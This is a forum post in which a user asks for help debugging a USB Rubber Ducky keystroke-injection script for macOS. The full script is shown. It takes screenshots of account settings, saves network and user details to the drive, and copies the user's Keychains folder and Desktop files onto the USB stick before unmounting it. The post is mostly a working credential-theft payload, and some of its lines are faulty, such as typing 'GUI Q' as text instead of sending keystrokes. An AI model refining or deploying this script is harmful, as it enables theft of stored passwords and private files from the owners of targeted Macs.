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  1. So I have a code I am working on to take a screenshot of the internet accounts and about this mac sections of OSX. Then I have it open up a terminal to write a file ifconfig and then it copys all of this to my Rubber ducky. Think is I cant get the Mac to screen shot. It keeps bypassing it and I think its the way I put it in my code. Here it goes (GUI SHIFT 3) is the code I think needs to be adjusted to take a screen shot. DELAY 1000 GUI SPACE DELAY 1000 STRING system preferences DELAY 2500 ENTER DELAY 2500 STRING internet accounts DELAY 2500 ENTER DELAY 1000 GUI TAB DELAY 1000 GUI SHIFT 3 DELAY 2000 ENTER STRING GUI Q DELAY 2000 GUI SPACE DELAY 1000 STRING about this Mac DELAY 1000 ENTER STRING GUI SHIFT 3 DELAY 1000 STRING GUI Q DELAY 1000 ENTER STRING GUI SPACE DELAY 1000 STRING terminal DELAY 1000 ENTER STRING ifconfig > /Volumes/USB/intscan.txt DELAY 1000 ENTER STRING id -un > /Volumes/USB/CurrentUSer.txt DELAY 1000 STRING cp -r ~/Library/Keychains/* /Volumes/USB DELAY 1000 ENTER DELAY 1500 STRING cp -r /Users/kali/Desktop/* /Volumes/USB DELAY 2000 ENTER STRING diskutil unmountDisk /Volumes/USB && exit DELAY 1000 GUI Q ENTER
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